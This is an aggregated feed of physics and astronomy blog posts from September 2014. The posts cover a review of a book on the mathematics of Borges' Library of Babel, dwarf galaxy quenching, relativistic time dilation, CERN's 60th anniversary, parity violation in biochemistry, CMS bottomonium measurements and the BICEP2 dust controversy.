This is a book I carried away from JSM in Boston as the Oxford University Press representative kindly provided my with a copy at the end of the meeting. After I asked for it, as I was quite excited to see a book linking Jorge Luis Borges’ great Library of Babel short story with mathematical concepts. Even though many other short stories by Borges have a mathematical flavour and are bound to fascinate mathematicians, the Library of Babel is particularly prone to mathemati-sation as it deals with the notions of infinite, periodicity, permutation, randomness… As it happens, William Goldbloom Bloch [a patronym that would surely have inspired Borges!], professor of mathematics at Wheaton College, Mass., published the unimaginable mathematics of Borges’ Library of Babel in 2008, so this is not a recent publication. But I had managed to miss through the several conferences where I stopped at OUP exhibit booth. (Interestingly William Bloch has also published a mathematical paper on Neil Stephenson’s Cryptonomicon.)

Now, what is unimaginable in the maths behind Borges’ great Library of Babel??? The obvious line of entry to the mathematical aspects of the book is combinatorics: how many different books are there in total? [Ans. 10¹⁸³⁴⁰⁹⁷...] how many hexagons are needed to shelf that many books? [Ans. 10⁶⁸¹⁵³¹...] how long would it take to visit all those hexagons? how many librarians are needed for a Library containing all volumes once and only once? how many different libraries are there [Ans. 1010⁶...] Then the book embarks upon some cohomology, Cavalieri’s infinitesimals (mentioned by Borges in a footnote), Zeno’s paradox, topology (with Klein’s bottle), graph theory (and the important question as to whether or not each hexagon has one or two stairs), information theory, Turing’s machine. The concluding chapters are comments about other mathematical analysis of Borges’ Grand Œuvre and a discussion on how much maths Borges knew.

So a nice escapade through some mathematical landscapes with more or less connection with the original masterpiece. I am not convinced it brings any further dimension or insight about it, or even that one should try to dissect it that way, because it kills the poetry in the story, especially the play around the notion(s) of infinite. The fact that the short story is incomplete [and short on details] makes its beauty: if one starts wondering at the possibility of the Library or at the daily life of the librarians [like, what do they eat? why are they there? where are the readers? what happens when they die? &tc.] the intrusion of realism closes the enchantment! Nonetheless, the unimaginable mathematics of Borges’ Library of Babel provides a pleasant entry into some mathematical concepts and as such may initiate a layperson not too shy of maths formulas to the beauty of mathematics.

Filed under: Books, Statistics, Travel, University life Tagged: book review, Boston, cohomology, combinatorics, infinity, information theory, Jorge Luis Borges, JSM 2014, Library of Babel, Oxford University Press, Turing's machine

by xi'an at September 29, 2014 10:14 PM

astrobites - astro-ph reader's digest

Shutting off Star Formation in Galaxies

TitleThe Mass Dependence of Dwarf Satellite Galaxy Quenching

Authors: Colin T. Slater, Eric F. Bell

First Author’s Institution: Dept. of Astronomy, University of Michigan, Ann Arbor, MI

Paper Status: Accepted to The Astrophysical Journal Letters

Galaxies can’t form stars forever! At some point in its evolution, a galaxy will consume all of its star forming fuel (cold, dense gas). Exactly when this occurs, however, isn’t a simple question of taking the amount of gas present and dividing by the star formation rate. There are a host of processes that can stop gas from cooling and condensing (as is necessary for star formation), thereby “quenching” star formation in a galaxy. One such process, called ram-pressure stripping, occurs as galaxies fall into galaxy clusters (or as dwarf galaxies orbit larger galaxies), and removes gas that would otherwise have cooled and fueled star formation. Another process is supernovae, which can heat up and eject gas. Galaxy-galaxy interactions like mergers can have a similar effect. This occurs most frequently in galaxy groups and galaxy clusters, where galaxies are relatively close together.

Although we have a good understanding of what processes can stop star formation, there still remain many unanswered questions, including how they work in a given galaxy, when they occur, which processes are dominant, and how all this may vary for different galaxies. The authors investigate these problems by examining how the fraction of quenched galaxies (those with star formation shut off) varies with galaxy mass for all galaxies within 3 Mpc of us. They also examine the role of galaxy environment, differentiating between satellite galaxies (such as those around our Milky Way), and those that are isolated (usually referred to as “field galaxies”). Armed with this information, they construct models to constrain some key parameters of the star formation quenching process.

Picking out Galaxies

The authors use a selection of galaxies from SDSS and the NASA-Sloan Atlas of galaxies (NSA). A galaxy here is classified as star forming if it contains young, hot stars and cold gas; this is not a perfect metric for all galaxies, however, and the authors take this uncertainty into account. The largest source of uncertainty here lies in determining whether or not a given galaxy is a satellite galaxy or an isolated galaxy. Galaxies are considered satellites if they lie within a specified redshift interval of another, more massive galaxy. The redshift is identified by the Doppler shifting of light from the observed galaxy. However, this is subject to projection effects, as the sometimes large peculiar velocities of galaxies can cause shifts in their redshift measurement that can cause them to appear as a satellite to another galaxy, contaminating the sample. The authors determine the likelihood of this occurring by conducting mock observations of a cosmological N-body simulation (the Millenium simulation), where the actual galaxy positions are known, and comparing the observed satellite count to the actual satellite count.

Fig. 1

Fig. 1: The fraction of quenched galaxies at a given galactic stellar mass (total mass of stars in the galaxy). The solid lines show, for a host galaxy of a given stellar mass, the fraction of its satellites that are quenched. The dashed lines show the fraction of isolated galaxies at a given mass that are quenched. The black lines denote SDSS galaxies, while green lines denote galaxies taken from the NSA sample. Due to the low values and large errors in the dashed lines, the authors consider these points consistent with zero. (Source: Fig. 1 of Slater and Bell 2014)


Their final results are shown in Fig. 1. For a galaxy at a given mass with satellites, the fraction of quenched satellites is shown with solid lines, while the quenched fraction of isolated galaxies at a given mass is given with the dashed line. Galaxies from the NSA sample are shown in green, SDSS in black. Their results show that a substantial fraction of all satellite galaxies are quenched, with nearly all at low stellar masses. Towards higher stellar masses, there is an obvious decrease in the quenched fraction until about 109 solar masses, where the quenched fraction begins to increase again. Due to the low quenched fraction of the field galaxies (dashed) and the large errors, the authors consider the quenched fraction of field galaxies to be consistent with zero.

 Improving Our Understanding of Quenching

The authors use their results to produce a better understanding of how long after a satellite galaxy reaches the point of closest approach (called pericenter) to the host galaxy does star formation cease. This model is somewhat akin to saying that once a satellite passes pericenter, it starts a fixed clock that counts down to its ceasing star formation. The authors do this by examining satellite galaxies in the cosmological N-body simulation called Via Lactea II. Looking at z = 0 in the simulation, they examine the distribution of times since pericenter passage for all satellite galaxies and show that, in order to reproduce the observed quenched fractions, star formation quenching must occur quickly for low mass galaxies, within 2 Gyr of pericenter passage. However, this clock is different for the higher mass (green in Fig. 1) galaxies, roughly 6-9 Gyr. This suggests that satellites of different masses respond differently to whatever effects will ultimately end their star formation.

The authors conduct a similar analysis using the maximum ram-pressure stripping force (which is related to the density of stars and dark matter in a galaxy, and the galaxy’s velocity) experienced by each satellite galaxy. They argue that, if ram-pressure stripping is the dominant source of quenching, that at least 50% of galaxies must experience forces of 10-12.8 dyne cm-2 or greater, and 90% must experience forces of 10-14.8 dyne cm-2 or greater. In addition, satellite galaxies, regardless of mass, appear to experience very similar ram pressure forces. Because of this, the authors argue that there must be a dramatic difference in how galaxies of different masses respond to ram-pressure stripping.

Improving our understanding of the galaxy quenching process requires work on multiple fronts. Here, the authors use observations to better understand quenching in our Universe, and construct models based upon those observations to constrain the various mechanisms posited for quenching. In future work, these observations and models can be used to constrain detailed computer simulations that attempt to directly reproduce the observed distribution. In the end, these all work together to advance our understanding of how galaxies evolve.

by Andrew Emerick at September 29, 2014 08:13 PM

Clifford V. Johnson - Asymptotia

Save “Krulwich Wonders”!
As readers of this blog who appreciate the idea of putting science into the daily routine for a balanced diet, of mixing in sketches here and there, of good humour and a wondering eye on the world.... you'll agree with me that we need to raise our voices and call out to NPR to Save "Krulwich Wonders". According to Robert Krulwich, they are planning to cancel his blog as part of cost-cutting... this would be a big blow for the (always in danger) mission to improve the public understanding of science. Many suggestions are in the comments to that post I liked above, so feel free to read them and follow the ones that make sense to you! [Update: I've put a hashtag #savewonderNPR into the accompanying tweet of this post, so feel free to use that in your own raising awareness efforts on this...] Act fast to let your voice be heard. The axe is on its way down!* -cvj *I learned this from the blog Nanoscale Views. Click to continue reading this post

by Clifford at September 29, 2014 05:35 PM

ZapperZ - Physics and Physicists

Test of Time Dilation Using Relativstic Li Ion Clocks
This may be a week old, but it is still important in validating SR.

A new result on the measurement of the effect of relativistic time dilation in stored Li ion has come up trumps for Special Relativity.

To carry out such a test, Benjamin Botermann of Johannes Gutenberg-University, Germany, and his colleagues looked for the relativistic Doppler shift in lithium ions accelerated to a third of the speed of light at the Experimental Storage Ring in Damstadt, Germany. The team stimulated two separate transitions in the ions using two lasers propagating in opposite directions with respect to the ion motion. The experiment effectively measures the shift in the laser frequencies relative to what these transition frequencies are for ions at rest. The combination of two frequency shifts eliminates uncertain parameters and allows the team to validate the time dilation prediction to a few parts per billion, improving on previous limits. The result complements other Lorentz violation tests that use higher precision atomic clocks but much slower relative velocities.

The more they test it, the more convincing it becomes.


by ZapperZ ( at September 29, 2014 03:53 PM

Symmetrybreaking - Fermilab/SLAC

CERN turns 60

CERN celebrates six decades of peaceful collaboration for science.

Today, CERN, the European Organization for Nuclear Research, is blowing out 60 candles at an event attended by official delegations from 35 countries. Founded in 1954, CERN is the largest particle physics laboratory in the world and a prime example of international collaboration, bringing together scientists of almost 100 nationalities.

CERN’s origins can be traced back to the late 1940s. In the aftermath of the Second World War, a small group of visionary scientists and public administrators on both sides of the Atlantic identified fundamental research as a potential vehicle to rebuild the continent and to foster peace in a troubled region. It was from these ideas that CERN was born on September 29, 1954, with a dual mandate to provide excellent science and to bring nations together. This blueprint for collaboration has worked remarkably well over the years and expanded to all the continents.

“For six decades, CERN has been a place where people can work together, regardless of their culture and nationality. We form a bridge between cultures by speaking a single universal language, and that language is science,” says CERN Director General Rolf Heuer. “Indeed, science is an essential part of culture. Maestro Ashkenazy, conducting the European Union Youth Orchestra here today, puts it most eloquently in saying that while music reflects the reality of our spiritual life and tries to convey to us the essence of our existence, science’s mission is extremely similar; it also tries to explain the world to us.”

CERN came into being in 1954 when its convention, agreed by 12 founding member states, came into force. Over the years and with its continuing success, CERN has attracted new countries and become a truly global organization, Today it has 21 member states and more than 10,000 users from all over the world, and more countries have applied for membership.

“Over time, CERN has become the world’s leading laboratory in particle physics, always oriented towards, and achieving, excellence,” says CERN Council President Agnieszka Zalewska.

CERN’s business is fundamental physics, aiming to find out what the universe is made of and how it works. Since CERN's founding, the landscape of fundamental physics has dramatically changed. Then, knowledge of matter at the smallest scales was limited to the nucleus of the atom. In 60 years, particle physicists have advanced knowledge of forces and matter at the smallest scales, developed a sound theory based on this knowledge—the Standard Model—and improved the understanding of the universe and its beginnings.

Over the years, physicists working at CERN have contributed to this progress as a series of larger and ever more powerful accelerators have allowed researchers to explore new frontiers of energy. Among the many results achieved, some discoveries have dramatically improved comprehension of the fundamental laws of nature and pushed forward technologies. These include the discovery of the particle carriers of the weak force, rewarded with a Nobel Prize for Carlo Rubbia and Simon van der Meer in 1984, the invention of the world wide web by Tim Berners-Lee in 1989, the development of a revolutionary particle detector by Georges Charpak, rewarded by a Nobel Prize in 1992, and the discovery of the Higgs boson in 2012, proving the existence of the Brout-Englert-Higgs mechanism, which led to a Nobel Prize for Peter Higgs and François Englert in 2013.

Today CERN operates the world’s leading particle accelerator, the Large Hadron Collider. With the restart of the LHC next year at new record energy, CERN will continue to seek answers to some of the most fundamental questions about the universe.

CERN published a version of this article as a press release.


Like what you see? Sign up for a free subscription to symmetry!

September 29, 2014 03:15 PM

Peter Coles - In the Dark

House on a Cliff

Indoors the tang of a tiny oil lamp. Outdoors
The winking signal on the waste of sea.
Indoors the sound of the wind. Outdoors the wind.
Indoors the locked heart and the lost key.

Outdoors the chill, the void, the siren. Indoors
The strong man pained to find his red blood cools,
While the blind clock grows louder, faster. Outdoors
The silent moon, the garrulous tides she rules.

Indoors ancestral curse-cum-blessing. Outdoors
The empty bowl of heaven, the empty deep.
Indoors a purposeful man who talks at cross
Purposes, to himself, in a broken sleep.

by Louis MacNeice (1907-1963).

by telescoper at September 29, 2014 12:31 PM

Tommaso Dorigo - Scientificblogging

Donate To Sense About Science!
Sense About Science is a non-profit organization that campaigns in favour of more correct diffusion and use of scientific information. It is a great attempt at increasing the quality of the scientific information in circulation, focusing on evidence and debunking false claims. The web site of the organization explains:

read more

by Tommaso Dorigo at September 29, 2014 10:49 AM

Lubos Motl - string vacua and pheno

Influence of parity violation on biochemistry measured
Parity violation could matter in biology, after all

Up to the 1950s, people would believe that the laws of physics were invariant under the simple left-right mirror reflection. However, neutrinos were found to be left-handed and other processes linked to the weak nuclear force that violate the left-right symmetry were found in the 1950s. You know, the direction of the electron that leaves a nucleus after it beta-radiates is correlated with the nucleon's spin even though the velocity is a polar vector and the spin is an axial vector – such a correlation couldn't exist in a left-right-symmetric world.

A prejudice has been falsified. Ten years later, the CP symmetry was shown to be invalid as well although its violation in Nature is even tinier. The combined CPT symmetry has to hold and does hold (at least so far), as implied by Pauli's CPT theorem.

Bromocamphor, to become a player below

With the help of chiral spinors (and perhaps self-dual or anti-self-dual middle, (\(2k+1\))-forms i.e. antisymmetric tensors if the spacetime dimension is \(4k+2\)) particle physicists learned to build left-right-asymmetric theories and it became a mundane business. The electroweak theory included in the Standard Model is the most tangible real-world example of a left-right-asymmetric theory.

We also observe some left-right asymmetry in the world around us. Most of us have a heart on the left side – which could be an accident. But such left-right asymmetries exist at a more elementary level. Amino acids and other molecules look different than their images in the mirror – and all the life we know seems to use only one of the two images, typically a "left-handed-screwed" version of such molecules.

Is there a relationship to the violation of the parity at the fundamental level?

Neutrinos don't seem to be directly relevant for biochemistry because they're almost entirely invisible. And the effect of the parity violation on the electrons' energy levels and the probabilities of chemical reactions seems to be too tiny. So I think it's fair to say that most of the competent biochemists and biophysicists would say that it's a coincidence that the life molecules are "skewed", "screwed", "spun", and "twisted" in a particular direction. Sometime at the beginning when life began to expand, it was only the life based on one chirality and it just ate the oppositely chiral "seeds of life", if there were any, as if it were food. Incidentally, I think if you eat the mirror proteins, you won't die but you won't get energy from them, either!

However, there was also a school of thought that those asymmetries could matter, after all. One unusually well-defined version of this paradigm was the so-called Vester-Ulbrict hypothesis which claimed that the cosmic beta-radiation (a beam of electrons from space) had a helicity (an asymmetry in helicities, to say the least), and it selectively killed the now-unobserved copy of the "two mirror images of life".

Now, some experimental evidence in favor of this paradigm was published in PRL:
Chirally Sensitive Electron-Induced Molecular Breakup and the Vester-Ulbricht Hypothesis (J. M. Dreiling and T. J. Gay, Sep 12th)

Weak Nuclear Force Shown to Give Asymmetry to Biochemistry of Life (Elizabeth Gibney, Nature and SciAm, popular, Sep 25th)
They were colliding longitudinally polarized sub-eV electrons (they are spinning around the axis in the direction of motion) with the molecules of \({\rm C}_{10}{\rm H}_{15}{\rm BrO}\), some organic compound called "bromocamphor" with bromine (see the diagram at the top), with the goal of breaking the molecule apart and get the bromine atom out of it.

This may be measured for the two mirror images of the molecule, left-handed and right-handed one, if you wish, and the probability of the breakup (dissociative bromine anion production) depends on the relative sign between the electron's helicity and the molecule's chirality. They found the ratio of the two reaction rates to be\[

\frac{N_+}{N_-} \sim 1.0006.

\] They differ by 0.06 percent. It's arguably measurable – although the guys could have fooled themselves, too – but it's still very small (although arguably larger than what you may expect the "tiny and esoteric" physics of the weak nuclear force to bring to low-energy fields such as biochemistry). I am not sure whether a difference that is this small may play a significant role in the selection of the "right" chiral edition of the organic molecules.

But there are contexts in which one may imagine that this difference gets brutally magnified. For example, imagine that a reservoir of such molecules is needed as "food reserves" at some point and these food reserves drop to a tiny percentage, say \(\exp(-10)\sim 0.0045\%\), of the original size. It's ten (decreasing) \(e\)-foldings. During the same time, if one reaction undergoes ten \(e\)-foldings, the mirror image undergoes \(10.006\) \(e\)-foldings, and because that number ends with \(0.006\), this reaction will leave a smaller amount of the food reserves by \(0.6\) percent. What I want to say is that if you allow the asymmetry to influence exponential processes for a sufficiently long time, the original \(0.06\) percent may increase to a larger relative difference, one multiplied by the number of \(e\)-foldings. The same magnification of the asymmetry may affect exponentially growing, "constructive" processes. But is that enough?

The asymmetry may get magnified in exponential processes. Another paradigm that allows the small asymmetry to be "seen" is some precision cancellation. Imagine that the two mirror images of the bromocamphor molecule are "soldiers in two opposing armies" and they destroy each other, one-against-one, in a very exact way (much like in annihilation of matter and antimatter). Then the survivors will come from the "slightly prevailing" version even if the difference was very tiny.

Well, there could also exist reactions where the difference is much higher than in this – arguably random – dissociative anion production. I remain unconvinced. It's plausible that the asymmetries are inevitably linked but I still find it rather unlikely. Just to be sure, if there are no key reactions that are much more sensitive and no important mechanisms where the asymmetry is magnified or accumulated, as mentioned above, I would say that the odds 49.997% and 50.003% may be considered indistinguishable from 50% and 50% - the chances for both lives would be "basically the same".

by Luboš Motl ( at September 29, 2014 06:26 AM

September 28, 2014

Clifford V. Johnson - Asymptotia

Because... Wedding Season. because_bow_tie_and_hat_cvj Crumpled bow tie at the end of a long but fun evening on a downtown LA hotel rooftop. -cvj Click to continue reading this post

by Clifford at September 28, 2014 06:02 PM

Clifford V. Johnson - Asymptotia

Dusting off Last Spring’s Excitement
There has been quite a bit of discussion of the realisation that the exciting announcement made by the BICEP2 experiment back in March (see my post here) was based on erroneous analysis. (In brief, various people began to realise that most, if not all, of what they observed could be explained in terms of something more mundane than quantum spacetime fluctuations in the ultra-early universe - the subtle effects of galactic dust. A recent announcement by another experiment, the Planck team, have quantified that a lot.) While there has been a bit of press coverage of the more sober realisations (see a nice June post on NPR's blog here), it is (as with previous such cases) nowhere near as high profile as the initial media blitz of March, for better or worse. I think that "worse" might be the case here, since it is important to communicate to the public (in a healthy way) that science is an ongoing process of discovery, verification, and checking and re-checking by various independent teams and individuals. It is a collective effort, with many voices and the decentralised ever-sceptical scientific process itself, however long it takes, ultimately building and broadening the knowledge base. This self-checking by the community, this reliance on independent confirmation of [...] Click to continue reading this post

by Clifford at September 28, 2014 03:47 PM

John Baez - Azimuth

Network Theory News


You may be wondering, somewhere deep in the back of your mind, what happened to the Network Theory series on this blog. It’s nowhere near done! I plan to revive it, since soon I’ll be teaching a seminar on network theory at U.C. Riverside. It will start in October and go on at least until the end of March.

Here’s a version of the advertisement I sent to the math grad students:

Network Theory Seminar

I’ll be running a seminar on Network Theory on Mondays from 3:10 to 4:30 pm in Surge 268 starting on October 6th.

Network theory uses the tools of modern math—categories, operads and more—to study complex systems made of interacting parts. The idea of this seminar is to start from scratch, explain what my grad students have been doing, and outline new projects that they and other students might want to work on. A lot has happened since I left town in January.

I hope to see you there!

If you want more detail, here is a sketch of what’s been happening.

1) Franciscus Rebro has been working on “cospans”, a very general way to treat a physical system with inputs and outputs and treat it as a morphism in category. This underlies all the other projects.

2) Brendan Fong, a student of mine at Oxford, is working on a category where the morphisms are electrical circuits, and composing morphisms is sticking together circuits:

• Brendan Fong, A compositional approach to control theory.

3) Blake Pollard, a student in the physics department, has been studying Markov processes. In a Markov process, things randomly hop from one vertex of a graph to another along edges. Blake has created a category where morphisms are ‘open’ Markov process, in which things flow in and out of certain special vertices called ‘terminals’.

4) Jason Erbele has been working on categories in control theory, the branch of math used to study physical systems that interact with the outside world via inputs and outputs. After finishing this paper:

• John Baez and Brendan Fong, Categories in control.

he’s been taking more concept from control theory and formalizing them using categories.

5) Oh yeah, and what about me? I gave a series of lectures on network theory at Oxford, and you can see videos of them here:

• John Baez, Network Theory.

Jacob Biamonte and I have also more or less finished a book on chemical reaction networks and Petri nets:

• John Baez and Jacob Biamonte, Quantum Techniques for Stochastic Mechanics.

But I won’t be talking about that; I want to talk about the new work my students are doing!

by John Baez at September 28, 2014 04:28 AM

September 27, 2014

Michael Schmitt - Collider Blog

CMS resolves states with a mass difference of 19 MeV

This week the CMS Collaboration released a paper reporting the measurement of the ratio of production cross sections for the χb2(1P) and the χb1(1P) heavy meson states (arXiv:1409.5761). The motivation stems from the theoretical difficulties in explaining how such states are formed, but for me as an experimenter the most striking feature of the analysis is the impressive separation of the χ states.

First, a little background. A bottom quark and an anti-bottom anti-quark can form a meson with a well-defined mass. These states bear some resemblance to positronium but the binding potential comes from the strong force, not electromagnetism. In the past, the spectrum of the masses of these states clarified important features of this potential, and led to the view that the potential increases with separation, rather than decreasing. As we all know, QCD is absolutely confining, and the first hints came from studies of charmonium and bottomonium. The masses of these and many other states have been precisely measured over the years, and now provide important tests of lattice calculations.

The mass of the χb2(1P) is 9912.21 MeV and the mass of the χb1(1P) is 9892.78 MeV; the mass difference is only 19.4 MeV. They sit together in a fairly complicated diagram of the states. Here is a nice version which comes from an annual review article by Patrignani, Pedlar and Rosner (arXiv:1212.6552) – I have circled the states under discussion here:

Bottomonium states

Bottomonium states

So, even on the scale of the bottomonium mesons, this separation of 19 MeV is quite small. Nonetheless, CMS manages to do a remarkably good job. Here is their plot:

Reconstructed chi states

Reconstructed chi states

Two peaks are clearly resolved: the χb2(1P) on the left (and represented by the green dashed line) and the χb1(1P) on the right (represented by the red dashed line). The two peaks are successfully differentiated, and the measurements of their relative rates can be carried out.

How do they do it? The χ stated decay to the Y(1S) by emitting a photon with a substantial branching fraction that is already known fairly well. The vector Y(1S) state is rather easily reconstructed through through its decays to a μ+μ- pair. The CMS spectrometer is excellent, as it the reconstruction of muons, so the Y(1S) state appears as a narrow peak. By detecting the photon and calculating the μμγ invariant mass, the χ states can be reconstructed.

Here is the interesting part: the photons are not reconstructed with the (rather exquisite) crystal electromagnetic calorimeter, because its energy resolution is not good enough. This may be surprising, since the Higgs decay to a pair of photons certainly is well reconstructed using the calorimeter. These photons, however, have a very low energy, and their energies are not so well measured. (Remember that electromagnetic calorimeter resolution goes roughly as 1/sqrt(E).) Instead, the CMS physicists took advantage of their tracking a second time, and reconstructed those photons that had cleanly converted into an e+e- pair. So the events of interest contained two muons, that together give the Y(1S) state, and an e+e- pair, which gives the photon emitted in the radiative decay of the χ state. The result is the narrow peaks displayed above; the yield is obtained simply by integrating the curves representing the two χ states.

This technique might conceivably be interesting when searching for peculiar signals of new physics.

It is difficult to ascertain the reconstruction efficiency of conversion pairs, since they tend to be asymmetric (either the electron or the positron gets most of the photon’s energy). By taking the ratio of yields, however, one obtains the ratio of cross sections times branching fractions. This ratio is experimentally clean, therefore, and robust. The mass spectrum was examined in four bins of the transverse momentum of the Y(1S); the plot above is the second such bin.

Here is the results of the measurement: four values of the ratio σ(χb2)/σ(χb1) plotted as a function of pT(Y):

Ratio of cross sections

Ratio of cross sections

LHCb have also made this measurement (arXiv:1202.1080), and their values are presented by the open circles; the CMS measurement agrees well with LHCb. The green horizontal band is simply an average of the CMS values, assuming no dependence on pT(Y). The orange curved band comes from a very recent theoretical calculation by Likhoded, Luchinsky and Poslavsky (arXiv:1409.0693). This calculation does not reproduce the data.

I find it remarkable that the CMS detector (and the other LHC detectors to varying degrees) can resolve such a small mass difference when examining the debris from an 8 TeV collision. These mass scales are different by a factor of two million. While there is no theoretical significance to this fact, it shows that experimenters must and can deal with such a huge range within one single apparatus. And they can.

by Michael Schmitt at September 27, 2014 10:56 PM

ZapperZ - Physics and Physicists

More Editorial On BICEP-2 Results
Anyone following the saga of the BICEP-2 results on the expansion of the early universe will have read many opinion pieces on it. Here is another one from The Economist, and strangely enough, it is quite well-written. I emphasis towards the end of the article on how science works:

Rowing back on a triumphant announcement about the first instants of creation may be a little embarrassing, but the saga is a useful reminder of how science works. There is no suggestion that anyone has behaved dishonourably. Admittedly, the BICEP team’s original press conference looks, with hindsight, seriously overconfident. More information-sharing between the various gravitational wave-hunters, all of whom guard their data jealously, might have helped tone down the triumphalism. But science, ideally, proceeds by exactly this sort of good-faith argument and honourable squabbling—until the weight of evidence forces one side to admit defeat.

This is where many in the general public don't fully understand. Reporting something and publishing something are merely the FIRST step in a tedious process of verification. The publication of something in peer-reviewed journals allows for others to scrutinize, verify, test, and duplicate the results, often in differing ways. Only when there is an independent agreement would something be considered to be valid or accepted.

How many other fields outside of science have that level of scrutiny and verification process?


by ZapperZ ( at September 27, 2014 02:03 PM

Clifford V. Johnson - Asymptotia

Here We Go Again
obama_cameron_table_tennis_by_paul_hackett Sadly, after a vote today in Parliament, Britain and the USA are officially bombing buddies in the Middle East again. This picture* strikes me as accurate representation of the relationship. [...] Click to continue reading this post

by Clifford at September 27, 2014 01:18 AM

September 26, 2014

arXiv blog

First Quantum Logic Operation for an Integrated Photonic Chip

The first teleportation of a photon inside a photonic chip illustrates both the potential for quantum computation and the significant challenges that lay ahead.


September 26, 2014 10:32 PM

CERN Bulletin

Ebola virus: recommendations
The CERN Medical Service has been closely following, in particular via the WHO, the development of the Ebola virus outbreak currently affecting some African countries. This infectious disease may be passed on through direct contact with the bodily fluids of a sick person.   Based on the recommendations of the WHO and the two Host States, Switzerland and France, as updated on their respective websites, so far there has been no ban on travel to the countries concerned. However, unless it is absolutely essential, you are advised not to visit any of the countries affected by Ebola (Guinea, Republic of Sierra Leone, Liberia, Nigeria). The two Host States have established an alert system, and a check is carried out on departure from the airports of those countries. It is strongly recommended that you contact the Medical Service if you are travelling to those countries. We remind you to observe the basic rules of hygiene such as frequent hand washing, whatever your destination. The Medical Service is at your disposal to help prepare for professional travel by advising on preventive measures relating to your health. Updated information on the CERN Medical Service website:

by CERN Medical Service at September 26, 2014 01:49 PM

Symmetrybreaking - Fermilab/SLAC

CERN gets new Guinness World Records title

The global authority on superlatives celebrates a tiny particle found in a massive machine.

The Higgs boson now holds a seat next to “world’s longest tongue” and “most swords swallowed underwater.” The latest version of the Guinness World Records book recognizes CERN’s discovery of the mass-giving particle.

The typical Guinness World Record has to be measurable and breakable. However, the organization also awards significant milestones for different subjects. The first proof of the existence of the Higgs boson, initially announced in 2012, made major news both within the particle physics community and beyond, prompting two Guinness World Records consultants to suggest including the discovery.

“I think anything we can do to encourage people into science is a good thing,” says Craig Glenday, editor-in-chief of Guinness World Records. “We’re largely a book that celebrates great achievements, so it’s a good way of saying science is great and should be celebrated.”

Glenday said that covering as wide a spectrum of topics as possible is important to the broad appeal of the books and to exposing people to new and interesting information they might not otherwise find. The annual edition, released on September 12 in the United States, also serves as a snapshot of what has happened in the last year. The crazy and fun records lure in readers who return to the book and get small doses of science over time.

“It sort of depresses me that people think Guinness World Records is only fat people and bearded women,” Glenday says. “That’s why it’s really important that we have records like this, because it shows we are prepared to look at the whole scope of what’s happening in the world.”

Glenday and science and technology records manager Sam Mason visited CERN to present the certificate for the Higgs discovery to a delegation including CERN’s director general Rolf-Dieter Heuer and to tour the ATLAS and CMS experiments that discovered the famed particle. The Guinness World Records representatives likened the experience to seeing the pyramids in person for the first time, calling the Large Hadron Collider a “technocathedral” and “an iconic image of science.”

“Each person had such an enthusiasm when they were talking to us about the topic,” Mason says of CERN’s passionate scientists. “They live and breathe particle physics.”

Guinness World Records also presented certificates for other CERN records already recognized in the regularly updated world records database: the largest scientific instrument (the LHC), the highest man-made temperature (5 trillion Kelvin) and the most powerful particle collider.

Tiziano Camporesi, leader of the CMS experiment at the LHC and a member of the receiving committee, says it was satisfying to see a fundamental research result spread to a much wider audience. He called the award “an amusing follow-up to the Higgs discovery.”

Both CERN and Guinness World Records are celebrating their 60th anniversaries this month. 

by Lauren Biron at September 26, 2014 01:00 PM

Jester - Resonaances

BICEP: what was wrong and what was right
As you already know, Planck finally came out of the closet.  The Monday paper shows that the galactic dust polarization fraction in the BICEP window is larger than predicted by pre-Planck models, as previously suggested by an independent theorist's analysis. As a result, the dust contribution to the B-mode power spectrum at moderate multipoles is about 4 times larger than estimated by BICEP. This implies that the dust alone can account for the signal strength reported by BICEP in March this year, without invoking a primordial component from the early universe. See the plot, borrowed from Kyle Helson's twitter, with overlaid BICEP data points and Planck's dust estimates.  For a detailed discussion of Planck's paper I recommend reading other blogs who know better than me, see e.g. here or here or here.  Instead, I will focus and the sociological and ontological aspects of the affair. There's no question that BICEP screwed up big time. But can we identify precisely which steps lead to the downfall, and which were a normal part of the scientific process?  The story is complicated and there are many contradicting opinions, so to clarify it I will provide you with simple right or wrong answers :)

  • BICEP Instrument: Right.
    Whatever happened one should not forget that,  at the instrumental level,  BICEP was a huge success. The sensitivity to B-mode polarization at  angular scales above a degree beats previous CMB experiments by an order of magnitude. Other experiments are following in their tracks, and we should soon obtain better limits on the tensor-to-scalar ratio.  (Though it seems BICEP already comes close to the ultimate sensitivity for single-frequency ground-based experiment, given the dust pollution demonstrated by Planck).  
  • ArXiv first: Right.
    Some complained that the BICEP result were announced before the paper was accepted in a journal. True, peer-review is the pillar of science, but it does not mean we have to adhere to obsolete 20th century standards. The BICEP paper has undergone a thorough peer-review process of the best possible kind that included the whole community. It is highly unlikely the error would have been caught by a random journal referee. 
  • Press conference: Right.  
    Many considered inappropriate that the release of the results was turned into a publicity stunt with a press conference, champagne, and  YouTube videos. My opinion is that,  as long as they believed the signal is robust, they had every right to throw a party, much like CERN did on the occasion of the Higgs discovery.  In the end  it didn't really matter. Given the importance of the discovery and how news spread over the blogosphere, the net effect on the public would be exactly the same if they just submitted to ArXiv.  
  • Data scraping: Right.
    There was a lot of indignation about the fact that, to estimate the dust polarization fraction in their field of view,  BICEP used preliminary Planck data digitized from a slide in a conference presentation. I don't understand what's the problem.  You should always use all publicly available relevant information; it's as simple as that. 
  • Inflation spin: Wrong.
    BICEP sold the discovery as the smoking-gun evidence for cosmic inflation. This narrative was picked by mainstream press, often mixing inflation with the big bang scenario. In reality, the primordial B-mode would be yet another evidence for inflation and a measurement of one crucial  parameter - the energy density during inflation. This would be of course a huge thing, but apparently not big enough for PR departments. The damage is obvious: now that the result does not stand,  the inflation picture and, by association,  the whole big bang scenario is  undermined in public perception. Now Guth and Linde cannot even dream of a Nobel prize, thanks to BICEP...  
  • Quality control: Wrong. 
    Sure, everyone makes mistakes. But, from what I heard, that unfortunate analysis of the dust polarization fraction based on the Planck polarization data was performed by a single collaboration member and never cross-checked. I understand  there's been some bad luck involved: the wrong estimate fell very close to the predictions of faulty pre-Planck dust models. But, for dog's sake, the whole Nobel-prize-worth discovery was hinging on that. There's nothing wrong with being wrong, but not double- and triple-checking crucial elements of the analysis is criminal. 
  • Denial: Wrong.
    The error in the estimate of the dust polarization fraction was understood soon after the initial announcement, and BICEP leaders  were aware of it. Instead of biting the bullet, they chose a we-stand-by-our-results story. This resembled a child sweeping a broken vase under the sofa in the hope that no one would notice...  

